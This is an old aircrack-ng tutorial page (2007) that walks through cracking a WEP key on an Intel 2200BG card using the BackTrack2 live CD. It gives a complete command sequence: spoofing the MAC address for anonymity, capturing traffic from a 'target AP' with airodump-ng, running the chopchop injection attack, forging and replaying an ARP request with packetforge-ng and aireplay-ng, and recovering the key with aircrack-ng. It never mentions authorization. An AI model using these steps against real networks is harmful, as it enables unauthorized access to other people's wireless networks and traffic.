This is an old revision of the document!
Version: 0.1 August 27, 2007
When I started using the aircrack-ng tools I did not have the best hardware for it. I only had an ibm thinkpad t42 that comes with an intel 2200BG card. Most of the wep attacks require to inject some packets in the network in order to speed up the process of gathering IVs. In order to do that, the device driver that we use for controlling our card has to support injection. This tutorial explains you how to compile and install modules in your linux box. Installing linux in my box was not an option so I decided to use the backtrack2 livecd. Backtrack comes already with the necessary drivers compiled and ready to be use directly from the cd.
Here are the basic steps we will be going through:
Keep in mind that we are going to be running different commands and we will need to check switch between them. Most documents recommend to start Xwindow and open then various xterminals. There is another option: screen.
Once the livecd has booted and you have logon, you can run this to verify that you actually have an ipw2200 base card:
# lspci -vv ..... 02:02.0 Network controller: Intel Corporation PRO/Wireless 2200BG Network Connection (rev 05) Subsystem: Intel Corporation Unknown device 2711 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium >TAbort- <TAbort- <MAbort- >SERR- <PERR- Latency: 64 (750ns min, 6000ns max), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 11 Region 0: Memory at c0210000 (32-bit, non-prefetchable) [size=4K] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=1 PME- ......
That command will list all the pci devices connected to the pci bus. You should see something similar to this when you run it on your machine. Note I removed most of the output.
Now, since you have an intel 2200BG base card, Linux should have autoloaded the ipw2200 device driver for you:
# lsmod | grep ipw2200 ipw2200 ......
When I used backtrack2 to test this, the rtap0 interface was not created after booting the livecd. We need the rtap0 up and running. That is why we have to reload the device driver again to force it:
# rmmod ipw2200 # modprobe ipw2200 rtap_iface=1
Ok, so we have verified that we have an ipw2200 card and that Linux can talk to it.
Now, we want to get a list of the wireless networks we have around. To do that:
# iwconfig eth1 list
Keep the output of this command in a window we will use it later.
I am assuming that linux mapped your wireless card under eth1. Most likely you have an ethernet card under eth0.
This step is optional but it will give us some anonimyty. On a new window:
# ifconfig eth1 up hw ether 00:11:22:33:44:55
Let's start configuring the wireless essid, channel, and setting up a fake key:
# iwconfig eth1 essid <ESSID> channel <#> key s:fakekey mode managed
Due to a device driver issue we have to force a fakekey to ensure the airdump-ng tools work properly.
ESSID is the name of the wireless network of our target AP. Channel is the wireless channel.
In another window, we start collecting data:
# airodump-ng --bssid <AP MAC> -w dump rtap0
Notice how we use rtap0 as a input interface. Also, all these commands we are going to be running generate output files. So it is a good idea to create a new directory and to run all of them from there.
Now it is time to do some injection. In a new window we will launch the chopchop attack:
# aireplay-ng -4 -a <AP MAC> -h 00:11:22:33:44:55 -i rtap0 eth1
Note the modifier “-i rtap0.” This tells aireplay to use rtap0 for listening and eth1 for injecting. Also “-4” is the type of attack (chopchop).
A prompt will ask you to use “this” packet. Type “y” and the attack should continue. Once it finishes you will have a plaintext (.cap) file and a keystream(.xor) file. The keystream file will look something like “replay_dec-######.xor”
Make sure there are no errors reported after using aireplay. If the attack doesn't start after selecting the packet, you might not be close enough to the AP or the AP is not vulnerable to the chopchop attack. I also received an error stating the checksum didn't match. I just re-ran aireplay and it was fine.
Now we will create an arp-request packet using the aquired keysteam file. The “-l” and “-k” options are the source IP and destination IP. They can be any valid IP. The destination can be the gateway (router IP) but the attack run faster if it is an arbitrary IP. This can be run in the same window we run the chopchop attack:
# packetforge-ng -0 -a <AP MAC> -h 00:11:22:33:44:55 -k 192.168.1.100 -l 192.168.1.101 -y replay_dec-####.xor -w arp-request
Finally we will send our newly created arp-request packet over and over. After this step you should see the “Data” begin to rise quickly back in the window were we had airodump-ng running. If the data doesn't change (usually between 80 and 350 per second) then something is wrong.
# aireplay-ng -2 -r arp-request eth1
We have to wait now so airodump-ng gathers enough data (enough IVs) so we can run airocrack-ng. How many packages we need so airocrack-ng cracks the wep key? It depends. The version of airocrack-ng that comes with backtrack2 is not the lastest one. There have been a lot of improvements in recent versions that have reduced the number of IVs needed. In my experience, I have found 300k (data output) is enough.
In another window we launch:
# aircrack-ng dump*.cap
Depending the number of packages you have gathered, this may take some minutes or you may get the key inmediately.
aircrack-ng can be run at the same time airodump-ng is running. This is very interesting because it will allow you to check the number of IVs that airodump-ng has gathered. If you think you don't have enough, just CTRL + C and wait for more packets to come.